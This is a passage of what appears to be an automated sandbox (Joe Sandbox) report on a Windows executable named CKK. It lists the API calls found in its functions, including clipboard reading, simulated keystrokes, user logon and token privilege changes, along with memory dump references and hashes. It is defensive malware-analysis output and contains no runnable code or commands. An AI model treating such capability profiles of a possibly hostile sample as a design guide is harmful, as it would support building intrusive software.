                                          • Instruction Fuzzy Hash: 84E0E53114122596F7652A77AC00FDA77C8AB427F4F15A222FC1CB65D1CB31DD01B1E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00E74D9C
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorFreeHeapLast_free
                                          • String ID:
                                          • API String ID: 1353095263-0
                                          • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                          • Instruction ID: fbc5dff280968cebf565be23754f46e8870ea11c37ae899460a58b36c509c6f4
                                          • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                          • Instruction Fuzzy Hash: C8E092761403059F8720CF6CD400A82B7F4EF84324720C529EADDE3310D331E812CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 4bd615cc695867de7f66b2c850999f4cf1dfedb81ab00fd7e4ee8818baa76a35
                                          • Instruction ID: 3994a81bfbef88181a77ed0fd30d60e33ae119a3d2ef9d24ff20c51410ebbd5d
                                          • Opcode Fuzzy Hash: 4bd615cc695867de7f66b2c850999f4cf1dfedb81ab00fd7e4ee8818baa76a35
                                          • Instruction Fuzzy Hash: 1DF01CB1305752CFDB349F65E490956BBE4BF14319320A96EE1EAA2661C7319848DB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLongPathNameW.KERNELBASE ref: 00E42DC4
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: LongNamePath_wcslen
                                          • String ID:
                                          • API String ID: 541455249-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __fread_nolock
                                          • String ID:
                                          • API String ID: 2638373210-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E43837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E43908
                                          • SetCurrentDirectoryW.KERNEL32 ref: 00E42B6B
                                            • Part of subcall function 00E430F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E4314E
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_$CurrentDirectory
                                          • String ID:
                                          • API String ID: 2619246295-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00E80704,?,?,00000000), ref: 00E803B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 00E41CBC
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: InfoParametersSystem
                                          • String ID:
                                          • API String ID: 3098949447-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E45745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E45773
                                          • GetLastError.KERNEL32 ref: 00EB76DE
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CreateErrorFileLast
                                          • String ID:
                                          • API String ID: 1214770103-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 00112311
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447471100.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_110000_CKK.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00ED961A
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ED965B
                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00ED969F
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ED96C9
                                          • SendMessageW.USER32 ref: 00ED96F2
                                          • GetKeyState.USER32(00000011), ref: 00ED978B
                                          • GetKeyState.USER32(00000009), ref: 00ED9798
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00ED97AE
                                          • GetKeyState.USER32(00000010), ref: 00ED97B8
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00ED97E9
                                          • SendMessageW.USER32 ref: 00ED9810
                                          • SendMessageW.USER32(?,00001030,?,00ED7E95), ref: 00ED9918
                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00ED992E
                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00ED9941
                                          • SetCapture.USER32(?), ref: 00ED994A
                                          • ClientToScreen.USER32(?,?), ref: 00ED99AF
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00ED99BC
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00ED99D6
                                          • ReleaseCapture.USER32 ref: 00ED99E1
                                          • GetCursorPos.USER32(?), ref: 00ED9A19
                                          • ScreenToClient.USER32(?,?), ref: 00ED9A26
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ED9A80
                                          • SendMessageW.USER32 ref: 00ED9AAE
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ED9AEB
                                          • SendMessageW.USER32 ref: 00ED9B1A
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00ED9B3B
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00ED9B4A
                                          • GetCursorPos.USER32(?), ref: 00ED9B68
                                          • ScreenToClient.USER32(?,?), ref: 00ED9B75
                                          • GetParent.USER32(?), ref: 00ED9B93
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00ED9BFA
                                          • SendMessageW.USER32 ref: 00ED9C2B
                                          • ClientToScreen.USER32(?,?), ref: 00ED9C84
                                          • TrackPopupMenuEx.USER32 ref: 00ED9CB4
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00ED9CDE
                                          • SendMessageW.USER32 ref: 00ED9D01
                                          • ClientToScreen.USER32(?,?), ref: 00ED9D4E
                                          • TrackPopupMenuEx.USER32 ref: 00ED9D82
                                            • Part of subcall function 00E59944: GetWindowLongW.USER32(?,000000EB), ref: 00E59952
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED9E05
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3429851547-4164748364
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00ED48F3
                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00ED4908
                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00ED4927
                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00ED494B
                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00ED495C
                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00ED497B
                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00ED49AE
                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00ED49D4
                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00ED4A0F
                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00ED4A56
                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00ED4A7E
                                          • IsMenu.USER32(?), ref: 00ED4A97
                                          • GetMenuItemInfoW.USER32 ref: 00ED4AF2
                                          • GetMenuItemInfoW.USER32 ref: 00ED4B20
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED4B94
                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00ED4BE3
                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00ED4C82
                                          • wsprintfW.USER32 ref: 00ED4CAE
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ED4CC9
                                          • GetWindowTextW.USER32 ref: 00ED4CF1
                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED4D13
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00ED4D33
                                          • GetWindowTextW.USER32 ref: 00ED4D5A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                          • String ID: %d/%02d/%02d
                                          • API String ID: 4054740463-328681919
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00E5F998
                                          • FindWindowW.USER32 ref: 00E9F474
                                          • IsIconic.USER32(00000000), ref: 00E9F47D
                                          • ShowWindow.USER32(00000000,00000009), ref: 00E9F48A
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F494
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E9F4AA
                                          • GetCurrentThreadId.KERNEL32 ref: 00E9F4B1
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E9F4BD
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9F4CE
                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9F4D6
                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00E9F4DE
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F4E1
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F4F6
                                          • keybd_event.USER32 ref: 00E9F501
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F50B
                                          • keybd_event.USER32 ref: 00E9F510
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F519
                                          • keybd_event.USER32 ref: 00E9F51E
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9F528
                                          • keybd_event.USER32 ref: 00E9F52D
                                          • SetForegroundWindow.USER32(00000000), ref: 00E9F530
                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00E9F557
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 4125248594-2988720461
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EA170D
                                            • Part of subcall function 00EA16C3: AdjustTokenPrivileges.ADVAPI32 ref: 00EA173A
                                            • Part of subcall function 00EA16C3: GetLastError.KERNEL32 ref: 00EA174A
                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00EA1286
                                          • DuplicateTokenEx.ADVAPI32 ref: 00EA12A8
                                          • CloseHandle.KERNEL32(?), ref: 00EA12B9
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EA12D1
                                          • GetProcessWindowStation.USER32 ref: 00EA12EA
                                          • SetProcessWindowStation.USER32 ref: 00EA12F4
                                          • OpenDesktopW.USER32 ref: 00EA1310
                                            • Part of subcall function 00EA10BF: AdjustTokenPrivileges.ADVAPI32 ref: 00EA10D4
                                            • Part of subcall function 00EA10BF: CloseHandle.KERNEL32(?), ref: 00EA10E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                          • String ID: $default$winsta0
                                          • API String ID: 22674027-1027155976
                                          • Opcode ID: d00d6f27f26a8c9b23e12ad573b01f74817b3aded94a0c088af92b7e3aa2f394
                                          • Instruction ID: 1ffcd77d93266806ec079102a4c1175759c1d8184a5dba7ae7ec07df65e83dc8
                                          • Opcode Fuzzy Hash: d00d6f27f26a8c9b23e12ad573b01f74817b3aded94a0c088af92b7e3aa2f394
                                          • Instruction Fuzzy Hash: 72819E71900209AFDF119FA9DC49FEE7BB9EF0D744F1451AAF920BA1A0C774A944CB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                            • Part of subcall function 00EA10F9: GetLastError.KERNEL32 ref: 00EA1120
                                            • Part of subcall function 00EA10F9: GetProcessHeap.KERNEL32 ref: 00EA112F
                                            • Part of subcall function 00EA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          • GetSecurityDescriptorDacl.ADVAPI32 ref: 00EA0BCC
                                          • GetAclInformation.ADVAPI32 ref: 00EA0C00
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0C17
                                          • GetAce.ADVAPI32 ref: 00EA0C51
                                          • AddAce.ADVAPI32 ref: 00EA0C6D
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0C84
                                          • GetProcessHeap.KERNEL32 ref: 00EA0C8C
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA0C93
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EA0CB4
                                          • CopySid.ADVAPI32 ref: 00EA0CBB
                                          • AddAce.ADVAPI32 ref: 00EA0CEA
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EA0D0C
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EA0D1E
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D45
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D4C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D55
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D5C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D65
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D6C
                                          • GetProcessHeap.KERNEL32 ref: 00EA0D78
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0D7F
                                            • Part of subcall function 00EA1193: GetProcessHeap.KERNEL32 ref: 00EA11A1
                                            • Part of subcall function 00EA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EA0BB1,?), ref: 00EA11A8
                                            • Part of subcall function 00EA1193: InitializeSecurityDescriptor.ADVAPI32 ref: 00EA11B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: c98619d79d091faf9cbd5fdfdc4bb88a39fed2139c1c67d2345f19e7bdbf72ed
                                          • Instruction ID: 25e20835a46eee071662b84aedb00990ef1781747f0852107cf4265c5fec66fa
                                          • Opcode Fuzzy Hash: c98619d79d091faf9cbd5fdfdc4bb88a39fed2139c1c67d2345f19e7bdbf72ed
                                          • Instruction Fuzzy Hash: 22719C7290121AAFDF10DFA5EC44BAEBBB8FF09354F144115E914BB190D771A909CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • OpenClipboard.USER32(00EDCC08), ref: 00EBEB29
                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EBEB37
                                          • GetClipboardData.USER32 ref: 00EBEB43
                                          • CloseClipboard.USER32 ref: 00EBEB4F
                                          • GlobalLock.KERNEL32 ref: 00EBEB87
                                          • CloseClipboard.USER32 ref: 00EBEB91
                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00EBEBBC
                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00EBEBC9
                                          • GetClipboardData.USER32 ref: 00EBEBD1
                                          • GlobalLock.KERNEL32 ref: 00EBEBE2
                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 00EBEC22
                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 00EBEC38
                                          • GetClipboardData.USER32 ref: 00EBEC44
                                          • GlobalLock.KERNEL32 ref: 00EBEC55
                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00EBEC77
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EBEC94
                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00EBECD2
                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00EBECF3
                                          • CountClipboardFormats.USER32 ref: 00EBED14
                                          • CloseClipboard.USER32 ref: 00EBED59
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                          • String ID:
                                          • API String ID: 420908878-0
                                          • Opcode ID: 0c43b91d3ca4a845b6720699581d11eeb391d04392496613a8ef1d79bb202de7
                                          • Instruction ID: 930d26ced6e287c3c7b785a65c0e80cb59d0be1a2a3ce3195e79de56f8d9d516
                                          • Opcode Fuzzy Hash: 0c43b91d3ca4a845b6720699581d11eeb391d04392496613a8ef1d79bb202de7
                                          • Instruction Fuzzy Hash: D461A0352042029FD310EF25E885FABB7E8EF84758F14651AF456B72A2CB71DD09CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00EB69BE
                                          • FindClose.KERNEL32(00000000), ref: 00EB6A12
                                          • FileTimeToLocalFileTime.KERNEL32 ref: 00EB6A4E
                                          • FileTimeToLocalFileTime.KERNEL32 ref: 00EB6A75
                                            • Part of subcall function 00E49CB3: _wcslen.LIBCMT ref: 00E49CBD
